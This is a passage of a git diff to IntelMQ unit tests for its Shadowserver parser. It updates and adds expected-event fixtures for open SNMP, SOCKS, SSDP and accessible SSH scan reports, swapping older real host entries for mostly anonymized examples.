                   "extra.file_name": "2019-01-01-scan_snmp-test-geo.csv",
                   }
-EVENTS = [{'__type': 'Event',
-           'feed.name': 'Open SNMP',
-           'classification.identifier': 'open-snmp',
-           'classification.taxonomy': 'vulnerable',
-           'classification.type': 'vulnerable-system',
-           'extra.sysname': 'ORSONKA',
-           'extra.version': 2,
-           'extra.sysdesc': 'Hardware: x86 Family 6 Model 8 Stepping 6 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor Free)',
-           'protocol.application': 'snmp',
-           'protocol.transport': 'udp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           'source.asn': 22864,
-           'source.geolocation.cc': 'US',
-           'source.geolocation.city': 'EDINBURG',
-           'source.geolocation.region': 'TEXAS',
-           'source.ip': '129.113.21.93',
-           'source.port': 161,
-           'source.reverse_dns': 'doesnotexist.utpa.edu',
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-03-16T03:45:50+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Open SNMP',
-           'classification.identifier': 'open-snmp',
-           'classification.taxonomy': 'vulnerable',
-           'classification.type': 'vulnerable-system',
-           'extra.sysdesc': 'ADSL Modem',
-           'extra.version': 2,
-           'extra.sysname': 'tc',
-           'protocol.application': 'snmp',
-           'protocol.transport': 'udp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           'source.asn': 3269,
-           'source.geolocation.cc': 'IT',
-           'source.geolocation.city': 'RAVENNA',
-           'source.geolocation.region': 'EMILIA-ROMAGNA',
-           'source.ip': '79.2.242.16',
-           'source.port': 17080,
-           'source.reverse_dns': 'host16-242-dynamic.2-79-r.retail.telecomitalia.it',
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-03-16T03:45:51+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Open SNMP',
-           'classification.identifier': 'open-snmp',
-           'classification.taxonomy': 'vulnerable',
-           'classification.type': 'vulnerable-system',
-           'extra.version': 2,
-           'protocol.application': 'snmp',
-           'protocol.transport': 'udp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[3]])),
-           'source.asn': 34610,
-           'source.geolocation.cc': 'SE',
-           'source.geolocation.city': 'UMEA',
-           'source.geolocation.region': 'VASTERBOTTENS LAN',
-           'source.ip': '95.109.21.127',
-           'source.port': 161,
-           'source.reverse_dns': 'ip6-127.skekraft.riksnet.se',
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-03-16T03:45:51+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Open SNMP',
-           'classification.identifier': 'open-snmp',
-           'classification.taxonomy': 'vulnerable',
-           'classification.type': 'vulnerable-system',
-           'extra.sysname': 'TD5130',
-           'extra.version': 2,
-           'extra.sysdesc': 'Linux ADSL2PlusRouter 2.6.19 #7 Tue Apr 9 17:06:16 CST 2013 mips',
-           'protocol.application': 'snmp',
-           'protocol.transport': 'udp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[4]])),
-           'source.asn': 7738,
-           'source.geolocation.cc': 'BR',
-           'source.geolocation.city': 'RIO DE JANEIRO',
-           'source.geolocation.region': 'RIO DE JANEIRO',
-           'source.ip': '201.8.4.57',
-           'source.port': 161,
-           'source.reverse_dns': '201-8-4-57.user.veloxzone.com.br',
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-03-16T03:45:51+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Open SNMP',
-           'classification.identifier': 'open-snmp',
-           'classification.taxonomy': 'vulnerable',
-           'classification.type': 'vulnerable-system',
-           'extra.sysdesc': 'Linux R6100 2.6.31 #1 Tue Jun 4 06:50:58 EDT 2013 mips MIB=01a01',
-           'extra.sysname': 'Unknow',
-           'extra.version': 2,
-           'protocol.application': 'snmp',
-           'protocol.transport': 'udp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[5]])),
-           'source.asn': 11427,
-           'source.geolocation.cc': 'US',
-           'source.geolocation.city': 'DALLAS',
-           'source.geolocation.region': 'TEXAS',
-           'source.ip': '76.186.106.223',
-           'source.port': 161,
-           'source.reverse_dns': 'cpe-76-186-106-223.tx.res.rr.com',
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-03-16T03:45:51+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Open SNMP',
-           'classification.identifier': 'open-snmp',
-           'classification.taxonomy': 'vulnerable',
-           'classification.type': 'vulnerable-system',
-           'extra.version': 2,
-           'extra.sysname': 'Beetel',
-           'extra.sysdesc': '110TC1',
-           'protocol.application': 'snmp',
-           'protocol.transport': 'udp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[6]])),
-           'source.asn': 24560,
-           'source.geolocation.cc': 'IN',
-           'source.geolocation.city': 'GURGAON',
-           'source.geolocation.region': 'HARYANA',
-           'source.ip': '182.68.111.119',
-           'source.port': 10214,
-           'source.reverse_dns': 'abts-north-dynamic-119.111.68.182.airtelbroadband.in',
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-03-16T03:45:51+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Open SNMP',
-           'classification.identifier': 'open-snmp',
-           'classification.taxonomy': 'vulnerable',
-           'classification.type': 'vulnerable-system',
-           'extra.sysname': 'CableHome',
-           'extra.sysdesc': 'BCW710J <<HW_REV: 1.01; VENDOR: Bnmux; BOOTR: 2.4.0alpha14; SW_REV: 5.30.5; MODEL: BCW710J>>',
-           'extra.version': 2,
-           'protocol.application': 'snmp',
-           'protocol.transport': 'udp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[7]])),
-           'source.asn': 24249,
-           'source.geolocation.cc': 'JP',
-           'source.geolocation.city': 'TOKYO',
-           'source.geolocation.region': 'TOKYO',
-           'source.ip': '125.214.158.32',
-           'source.port': 161,
-           'source.reverse_dns': 'jway-125-214-158-032.jway.ne.jp',
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-03-16T03:45:51+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Open SNMP',
-           'classification.identifier': 'open-snmp',
-           'classification.taxonomy': 'vulnerable',
-           'classification.type': 'vulnerable-system',
-           'extra.sysname': 'Unknow',
-           'extra.version': 2,
-           'extra.sysdesc': 'Linux WNR1000v2 2.6.15 #199 Thu Jan 28 09:49:57 CST 2010 mips MIB=01a01',
-           'protocol.application': 'snmp',
-           'protocol.transport': 'udp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[8]])),
-           'source.asn': 10796,
-           'source.geolocation.cc': 'US',
-           'source.geolocation.city': 'LOUISVILLE',
-           'source.geolocation.region': 'KENTUCKY',
-           'source.ip': '74.138.148.8',
-           'source.port': 161,
-           'source.reverse_dns': '74-138-148-8.dhcp.insightbb.com',
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-03-16T03:45:51+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Open SNMP',
-           'classification.identifier': 'open-snmp',
-           'classification.taxonomy': 'vulnerable',
-           'classification.type': 'vulnerable-system',
-           'extra.version': 2,
-           'protocol.application': 'snmp',
-           'protocol.transport': 'udp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[9]])),
-           'source.asn': 9318,
-           'source.geolocation.cc': 'KR',
-           'source.geolocation.city': 'SEOUL',
-           'source.geolocation.region': "SEOUL-T'UKPYOLSI",
-           'source.ip': '222.233.225.196',
-           'source.port': 161,
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-03-16T03:45:51+00:00'},
-          {'__type': 'Event',
-           'feed.name': 'Open SNMP',
-           'classification.identifier': 'open-snmp',
-           'classification.taxonomy': 'vulnerable',
-           'classification.type': 'vulnerable-system',
-           'extra.version': 2,
-           'extra.sysdesc': 'D-Link Wireless Voice Gateway <<HW_REV: B4; VENDOR: D-Link; BOOTR: 2.4.0beta1; SW_REV: 1.1.0.4; MODEL: DCM-704>>',
-           'extra.sysname': 'CableHome',
-           'protocol.application': 'snmp',
-           'protocol.transport': 'udp',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[10]])),
-           'source.asn': 5483,
-           'source.geolocation.cc': 'HU',
-           'source.geolocation.city': 'BUDAPEST',
-           'source.geolocation.region': 'BUDAPEST',
-           'source.ip': '84.3.91.88',
-           'source.port': 161,
-           'source.reverse_dns': '54035b58.catv.pool.telekom.hu',
-           'time.observation': '2015-01-01T00:00:00+00:00',
-           'time.source': '2014-03-16T03:45:51+00:00'}]
+EVENTS = [
+        {
+   '__type' : 'Event',
+   'classification.identifier' : 'open-snmp',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.community' : 'public',
+   'extra.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.tag' : 'snmp',
+   'extra.version' : 2,
+   'feed.name' : 'Open SNMP',
+   'protocol.application' : 'snmp',
+   'protocol.transport' : 'udp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.1',
+   'source.port' : 161,
+   'source.reverse_dns' : 'node01.example.com',
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:00+00:00'
+},
 
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-snmp',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.community' : 'public',
+   'extra.device_sector' : 'consumer',
+   'extra.device_type' : 'router',
+   'extra.device_vendor' : 'MikroTik',
+   'extra.sysdesc' : 'RouterOS RB4011iGS+',
+   'extra.tag' : 'snmp',
+   'extra.version' : 2,
+   'feed.name' : 'Open SNMP',
+   'protocol.application' : 'snmp',
+   'protocol.transport' : 'udp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.2',
+   'source.port' : 161,
+   'source.reverse_dns' : 'node02.example.com',
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:01+00:00'
+},
+
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-snmp',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.community' : 'public',
+   'extra.device_model' : 'CG2001-UN2NA',
+   'extra.device_sector' : 'consumer',
+   'extra.device_type' : 'router',
+   'extra.device_vendor' : 'KAONMEDIA',
+   'extra.sysdesc' : 'Kaonmedia cablemodem reference design <<HW_REV: v1.0; VENDOR: Kaonmedia; BOOTR: 2.4.0mp1; SW_REV: 3.0.8; MODEL: CG2001-UN2NA>',
+   'extra.tag' : 'snmp',
+   'extra.version' : 2,
+   'feed.name' : 'Open SNMP',
+   'protocol.application' : 'snmp',
+   'protocol.transport' : 'udp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.3',
+   'source.port' : 161,
+   'source.reverse_dns' : 'node03.example.com',
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:02+00:00'
+}
+        ]
 
 class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
     """
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_socks.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_socks.py
new file mode 100644
index 000000000..067602aa1
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_socks.py
@@ -0,0 +1,107 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/scan_socks.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Open SOCKS',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2010-02-10T00:00:00+00:00",
+                  "extra.file_name": "2010-02-10-scan_socks-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-socks',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'feed.name' : 'Open SOCKS',
+   'protocol.application' : 'socks4',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.1',
+   'source.port' : 1080,
+   'source.reverse_dns' : 'node01.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:00+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-socks',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'feed.name' : 'Open SOCKS',
+   'protocol.application' : 'socks5',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.2',
+   'source.port' : 1080,
+   'source.reverse_dns' : 'node02.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:01+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-socks',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.source.sector' : 'Retail Trade',
+   'feed.name' : 'Open SOCKS',
+   'protocol.application' : 'socks4',
+   'protocol.transport' : 'tcp',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.3',
+   'source.port' : 1080,
+   'source.reverse_dns' : 'node03.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:02+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_ssdp.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_ssdp.py
index 9112ccfe8..afd6ec560 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_scan_ssdp.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_ssdp.py
@@ -22,61 +22,38 @@
                   "time.observation": "2015-01-01T00:00:00+00:00",
                   "extra.file_name": "2019-01-01-scan_ssdp-test-geo.csv",
                   }
-EVENTS = [{'__type': 'Event',
-           'feed.name': 'Open SSDP',
-           "classification.identifier": "open-ssdp",
-           "classification.taxonomy": "vulnerable",
-           "classification.type": "vulnerable-system",
-           "extra.cache_control": "max-age=1800",
-           "extra.header": "HTTP/1.1 200 OK",
-           "extra.location": "http://198.123.245.1:52869/gatedesc.xml",
-           "extra.naics": 517311,
-           "extra.search_target": "upnp:rootdevice",
-           "extra.server": "Linux, UPnP/1.0, Portable SDK for UPnP devices/1.6.6",
-           "extra.systime": "Fri, 16 Jan 1970 00:05:23 GMT",
-           "extra.tag": "ssdp",
-           "extra.unique_service_name": "uuid:20809696-105a-3721-e8b8-2c957f6259fe::upnp:rootdevice",
-           "protocol.application": "ssdp",
-           "protocol.transport": "udp",
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           "source.asn": 5678,
-           "source.geolocation.cc": "AA",
-           "source.geolocation.city": "LOCATION",
-           "source.geolocation.region": "LOCATION",
-           "source.ip": "198.123.245.171",
-           "source.port": 32822,
-           "time.observation": "2015-01-01T00:00:00+00:00",
-           "time.source": "2019-09-04T07:13:42+00:00"
-          },
-          {'__type': 'Event',
-           'feed.name': 'Open SSDP',
-           "classification.identifier": "open-ssdp",
-           "classification.taxonomy": "vulnerable",
-           "classification.type": "vulnerable-system",
-           "extra.cache_control": "max-age=1800",
-           "extra.header": "HTTP/1.1 200 OK",
-           "extra.location": "http://198.123.245.1:52869/gatedesc.xml",
-           "extra.naics": 517311,
-           "extra.search_target": "upnp:rootdevice",
-           "extra.server": "Linux/2.6.20-Amazon_SE, UPnP/1.0, Intel SDK for UPnP devices /1.2",
-           "extra.systime": "Thu, 20 Jan 2000 12:14:46 GMT",
-           "extra.tag": "ssdp",
-           "extra.unique_service_name": "uuid:160a0200-ac91-4b05-8adf-f5ccc5a5ebaa::upnp:rootdevice",
-           "protocol.application": "ssdp",
-           "protocol.transport": "udp",
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[2]])),
-           "source.asn": 5678,
-           "source.geolocation.cc": "AA",
-           "source.geolocation.city": "LOCATION",
-           "source.geolocation.region": "LOCATION",
-           "source.ip": "198.123.245.237",
-           "source.port": 32818,
-           "source.reverse_dns": "localhost.localdomain",
-           "time.observation": "2015-01-01T00:00:00+00:00",
-           "time.source": "2019-09-04T07:13:50+00:00",
-          }]
+EVENTS = [
+        {
+   '__type' : 'Event',
+   'classification.identifier' : 'open-ssdp',
+   'classification.taxonomy' : 'vulnerable',
+   'classification.type' : 'vulnerable-system',
+   'extra.content_type' : 'plex/media-server',
+   'extra.header' : 'HTTP/1.0 200 OK',
+   'extra.instance' : 'DESKTOP-DJ4NNGP',
+   'extra.resource_identifier' : 'e9d68a3332542938345388a40001be08f8907b32',
+   'extra.server' : 'c6ca79537ead4f14aa1456890f9d5c71.plex.direct',
+   'extra.server_port' : '32400',
+   'extra.naics' : 517311,
+   'extra.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.tag' : 'plex',
+   'extra.updated_at' : '1644185489',
+   'extra.version' : '1.19.3.2764-ef515a800',
+   'feed.name' : 'Open SSDP',
+   'protocol.application' : 'ssdp',
+   'protocol.transport' : 'udp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[1]])),
+   'source.asn' : 12345,
+   'source.geolocation.cc' : 'US',
+   'source.geolocation.city' : 'LITTLETON',
+   'source.geolocation.region' : 'COLORADO',
+   'source.ip' : '98.53.0.0',
+   'source.port' : 32414,
+   'time.observation' : '2015-01-01T00:00:00+00:00',
+   'time.source' : '2022-02-07T06:11:01+00:00'
+}
+          ]
 
 
 class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_scan_ssh.py b/intelmq/tests/bots/parsers/shadowserver/test_scan_ssh.py
new file mode 100644
index 000000000..a01383713
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_scan_ssh.py
@@ -0,0 +1,182 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/scan_ssh.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Accessible SSH',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2022-01-07T00:00:00+00:00",
+                  "extra.file_name": "2022-01-07-scan_ssh-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-ssh',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.algorithm' : 'ecdsa-sha2-nistp256',
+   'extra.available_ciphers' : 'chacha20-poly1305@openssh.com, aes128-ctr, aes192-ctr, aes256-ctr, aes128-gcm@openssh.com, aes256-gcm@openssh.com, aes128-cbc, aes192-cbc, aes256-cbc, blowfish-cbc, cast128-cbc, 3des-cbc',
+   'extra.available_compression' : 'none, zlib@openssh.com',
+   'extra.available_kex' : 'curve25519-sha256, curve25519-sha256@libssh.org, ecdh-sha2-nistp256, ecdh-sha2-nistp384, ecdh-sha2-nistp521, diffie-hellman-group-exchange-sha256, diffie-hellman-group16-sha512, diffie-hellman-group18-sha512, diffie-hellman-group-exchange-sha1, diffie-hellman-group14-sha256, diffie-hellman-group14-sha1, diffie-hellman-group1-sha1',
+   'extra.available_mac' : 'umac-64-etm@openssh.com, umac-128-etm@openssh.com, hmac-sha2-256-etm@openssh.com, hmac-sha2-512-etm@openssh.com, hmac-sha1-etm@openssh.com, umac-64@openssh.com, umac-128@openssh.com, hmac-sha2-256, hmac-sha2-512, hmac-sha1',
+   'extra.ecdsa_curve' : 'P-256',
+   'extra.ecdsa_curve25519' : '1xx7ASut7BF4ED8b592bebZBMBKTCzOsmbH4cjwx/0U=',
+   'extra.ecdsa_public_key_b' : 'WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=',
+   'extra.ecdsa_public_key_gx' : 'axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=',
+   'extra.ecdsa_public_key_gy' : 'T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=',
+   'extra.ecdsa_public_key_length' : '256',
+   'extra.ecdsa_public_key_n' : '/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE=',
+   'extra.ecdsa_public_key_p' : '/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=',
+   'extra.ecdsa_public_key_x' : 'NIQdotpy2HAHfSu0DjEmA3cb3NeQKabZaFX9OU0GsPY=',
+   'extra.ecdsa_public_key_y' : '0fuNQAZX7XciX2YkqIHtK2dWLBYwVCCqvl//zoM42kI=',
+   'extra.selected_cipher' : 'aes128-ctr',
+   'extra.selected_compression' : 'none',
+   'extra.selected_kex' : 'curve25519-sha256@libssh.org',
+   'extra.selected_mac' : 'hmac-sha2-256',
+   'extra.server_cookie' : 'bGjsifbPIDWT7tAu8BMjyg==',
+   'extra.server_host_key' : 'AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDSEHaLacthwB30rtA4xJgN3G9zXkCmm2WhV/TlNBrD20fuNQAZX7XciX2YkqIHtK2dWLBYwVCCqvl//zoM42kI=',
+   'extra.server_host_key_sha256' : 'a6e4e1c16ba25d51bcddc58a6e16797144575dd18d02d9dedf75093d2b15c557',
+   'extra.server_signature_raw' : 'AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAABKAAAAIQCd+X/B/OEx+FrwJSlVecOvNMuS5w2vTRz0z4prM+5VBwAAACEArU60b9CHs/d5BgyaOd7vmFygTMK5SyL90bS8VIztX/4=',
+   'extra.server_signature_value' : 'AAAAIQCd+X/B/OEx+FrwJSlVecOvNMuS5w2vTRz0z4prM+5VBwAAACEArU60b9CHs/d5BgyaOd7vmFygTMK5SyL90bS8VIztX/4=',
+   'extra.serverid_raw' : 'SSH-2.0-OpenSSH_7.4',
+   'extra.serverid_software' : 'OpenSSH_7.4',
+   'extra.serverid_version' : '2.0',
+   'extra.source.naics' : 454110,
+   'extra.tag' : 'ssh',
+   'extra.userauth_methods' : 'publickey',
+   'feed.name' : 'Accessible SSH',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[1]])),
+   'source.asn' : 16509,
+   'source.geolocation.cc' : 'JP',
+   'source.geolocation.city' : 'TOKYO',
+   'source.geolocation.region' : 'TOKYO',
+   'source.ip' : '18.179.0.0',
+   'source.port' : 22,
+   'source.reverse_dns' : 'ec2-18-179-0-0.ap-northeast-1.compute.amazonaws.com',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T02:20:37+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-ssh',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.algorithm' : 'ssh-rsa',
+   'extra.available_ciphers' : 'aes128-cbc, 3des-cbc, aes256-cbc, twofish256-cbc, twofish-cbc, twofish128-cbc, blowfish-cbc',
+   'extra.available_compression' : 'none',
+   'extra.available_kex' : 'diffie-hellman-group1-sha1',
+   'extra.available_mac' : 'hmac-sha1-96, hmac-sha1, hmac-md5',
+   'extra.device_vendor' : 'Arris',
+   'extra.rsa_exponent' : '65537',
+   'extra.rsa_length' : '1040',
+   'extra.rsa_modulus' : 'g6tZBqqsHUFa8gjXKMg2waZy/6JLzNnfTZkdDo6a3E6Amdk2eVlGbdgRsDxNUCyWLJI4b+xsJX0OKoRKhw4N+cDK5Du4/S00Auylt8YrDi7lIpeBZjMT5KJerN/feOcwRqY8NJfwZiZ1A5brcWr5HXfOH6aRTMFzadr248VdUmFXPQ==',
+   'extra.selected_cipher' : 'aes128-cbc',
+   'extra.selected_compression' : 'none',
+   'extra.selected_kex' : 'diffie-hellman-group1-sha1',
+   'extra.selected_mac' : 'hmac-sha1',
+   'extra.server_cookie' : 'Y4RQS9sdRgEFwNJKVP6bZg==',
+   'extra.server_host_key' : 'AAAAB3NzaC1yc2EAAAADAQABAAAAgwCDq1kGqqwdQVryCNcoyDbBpnL/okvM2d9NmR0OjprcToCZ2TZ5WUZt2BGwPE1QLJYskjhv7GwlfQ4qhEqHDg35wMrkO7j9LTQC7KW3xisOLuUil4FmMxPkol6s39945zBGpjw0l/BmJnUDlutxavkdd84fppFMwXNp2vbjxV1SYVc9',
+   'extra.server_host_key_sha256' : 'd53fedbfe92e631264629882b2e85bfd213ca4b07b824cd31f8de1fcb8d0ddcb',
+   'extra.server_signature_raw' : 'AAAAB3NzaC1yc2EAAACCLQj+UTJEQqdb/p/c/19yVc63eo+rnedwXKjP6eNNxxijN2cFoOjVMeqT2QTBjyoN7yRWBU2EID+3y2jUYT8mCqmqfyUv1eEbiCfLVlUyQ0X/CY9I5DDb5l6yEjNkuH2xVNNV6R7GFRwyYKAsYzfy+i9o1OORlUh3tozkkPfA9z/NlA==',
+   'extra.server_signature_value' : 'LQj+UTJEQqdb/p/c/19yVc63eo+rnedwXKjP6eNNxxijN2cFoOjVMeqT2QTBjyoN7yRWBU2EID+3y2jUYT8mCqmqfyUv1eEbiCfLVlUyQ0X/CY9I5DDb5l6yEjNkuH2xVNNV6R7GFRwyYKAsYzfy+i9o1OORlUh3tozkkPfA9z/NlA==',
+   'extra.serverid_raw' : 'SSH-2.0-ARRIS_0.50',
+   'extra.serverid_software' : 'ARRIS_0.50',
+   'extra.serverid_version' : '2.0',
+   'extra.tag' : 'ssh',
+   'extra.userauth_methods' : 'publickey, password',
+   'feed.name' : 'Accessible SSH',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[2]])),
+   'source.asn' : 11976,
+   'source.geolocation.cc' : 'US',
+   'source.geolocation.city' : 'MARSHALL',
+   'source.geolocation.region' : 'TEXAS',
+   'source.ip' : '170.10.0.0',
+   'source.port' : 22,
+   'source.reverse_dns' : '170-10-0-0.example.com',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T02:20:37+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'open-ssh',
+   'classification.taxonomy' : 'other',
+   'classification.type' : 'other',
+   'extra.algorithm' : 'ssh-rsa',
+   'extra.available_ciphers' : 'aes128-cbc, 3des-cbc, aes192-cbc, aes256-cbc',
+   'extra.available_compression' : 'none',
